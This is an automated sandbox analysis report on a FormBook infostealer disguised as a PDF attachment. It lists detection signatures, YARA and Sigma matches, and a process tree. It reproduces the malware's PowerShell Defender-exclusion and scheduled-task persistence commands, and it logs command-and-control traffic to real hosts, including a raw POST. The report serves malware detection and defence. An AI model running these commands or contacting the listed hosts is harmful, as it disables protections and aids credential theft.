Windows Analysis Report
Re property pdf.exe

Overview

General Information

Sample name: Re property pdf.exe
Analysis ID: 1537675
MD5: a217ff7da729f56faf0bb3de4ad87f40
SHA1: 991801525b52069bb48c8c2907dcb587c592ce11
SHA256: a9d4aa43728b39fde9ba1ae406c10904369c6ccfbeed1c347b847b0e8ca6bcb1
Tags: exe, user-TeamDreier
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Re property pdf.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Re property pdf.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7704 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Re property pdf.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\Re property pdf.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
      • uGMCFMVqKoR.exe (PID: 3980 cmdline: "C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PresentationHost.exe (PID: 1376 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)
          • firefox.exe (PID: 5752 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • hwOHPmqcegxcxb.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • schtasks.exe (PID: 8056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hwOHPmqcegxcxb.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
    • hwOHPmqcegxcxb.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe" MD5: A217FF7DA729F56FAF0BB3DE4AD87F40)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ef13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
6.2.Re property pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.Re property pdf.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ef13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17162:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.Re property pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.Re property pdf.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e113:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16362:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", ProcessId: 7668, ProcessName: powershell.exe
            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, ParentImage: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, ParentProcessId: 7852, ParentProcessName: hwOHPmqcegxcxb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp", ProcessId: 8056, ProcessName: schtasks.exe
            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", ProcessId: 7704, ProcessName: schtasks.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe", ProcessId: 7668, ProcessName: powershell.exe

            Persistence and Installation Behavior

            Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Re property pdf.exe", ParentImage: C:\Users\user\Desktop\Re property pdf.exe, ParentProcessId: 7480, ParentProcessName: Re property pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp", ProcessId: 7704, ProcessName: schtasks.exe

            AV Detection

            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, ReversingLabs: Detection: 91%
            Source: Re property pdf.exe, ReversingLabs: Detection: 91%
            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Joe Sandbox ML: detected
            Source: Re property pdf.exe, Joe Sandbox ML: detected
            Source: Re property pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Re property pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: PresentationHost.pdbGCTL source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uGMCFMVqKoR.exe, 00000010.00000002.4211703538.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Re property pdf.exe, Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationHost.pdb source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe, Code function: 4x nop then pop edi (16_2_0596FC25)
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe, Code function: 4x nop then mov esp, ebp (16_2_0596DC53)
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe, Code function: 4x nop then xor eax, eax (16_2_059737CA)
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe, Code function: 4x nop then pop edi (16_2_05970284)

            Networking

            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 172.67.181.186:80
            Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49858 -> 172.67.181.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49843 -> 172.67.181.186:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49888 -> 172.67.181.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 104.223.44.195:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49919 -> 104.223.44.195:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49950 -> 104.223.44.195:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49873 -> 172.67.181.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49965 -> 104.223.44.195:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 172.67.196.90:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 172.67.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 221.128.225.57:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49996 -> 203.161.41.204:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 129.226.56.200:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50019 -> 203.161.41.204:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 172.67.196.90:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 203.161.41.204:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 221.128.225.57:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 203.161.41.204:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 129.226.56.200:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 221.128.225.57:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 221.128.225.57:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 129.226.56.200:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 129.226.56.200:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 172.67.196.90:80
            Source: DNS query: www.hcpf.xyz
            Source: Joe Sandbox View IP Address: 199.59.243.227
            Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS
            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View ASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownHTTP traffic detected: POST /uy9i/ HTTP/1.1Host: www.hcpf.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.hcpf.xyzReferer: http://www.hcpf.xyz/uy9i/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)Data Raw: 32 42 57 44 47 3d 4e 35 67 6e 38 51 73 30 37 7a 6e 73 6b 70 4d 4d 68 37 4d 4d 53 4b 61 35 35 34 74 35 56 31 39 45 44 46 7a 79 32 58 57 4a 5a 62 64 2b 69 41 6b 73 41 72 79 61 6b 30 72 44 6e 44 6a 78 47 77 49 72 56 75 31 6e 45 59 6b 46 6b 41 2f 61 39 63 42 31 55 33 4d 61 4e 79 2f 6c 72 69 7a 45 34 65 35 31 4e 71 58 56 78 57 34 4f 6c 73 36 34 74 32 38 33 55 56 4d 43 46 48 34 30 61 52 62 31 49 38 71 69 75 4e 34 51 30 30 65 73 6e 32 44 2f 38 6e 7a 48 57 33 55 72 79 51 6f 78 32 34 72 4e 35 67 78 45 37 41 33 2f 31 79 52 62 7a 45 38 52 55 57 6b 68 30 76 49 33 43 31 38 35 79 55 70 36 58 75 75 55 59 67 3d 3d Data Ascii: 2BWDG=N5gn8Qs07znskpMMh7MMSKa554t5V19EDFzy2XWJZbd+iAksAryak0rDnDjxGwIrVu1nEYkFkA/a9cB1U3MaNy/lrizE4e51NqXVxW4Ols64t283UVMCFH40aRb1I8qiuN4Q00esn2D/8nzHW3UryQox24rN5gxE7A3/1yRbzE8RUWkh0vI3C185yUp6XuuUYg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHB3N0phCtXpx3kUmVrWpZAbollU%2Fd5%2BaA9gAXg8iDaqNLVeXe16bRRvxFTw%2FQ5ar%2BWJqWBmUEfn49rsKG1lZFGpGgxswoGsr%2BRU%2FrdOFX%2FTw3bYwuFcEXM4Vm8EuGQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d503f21accf4755-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=851&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 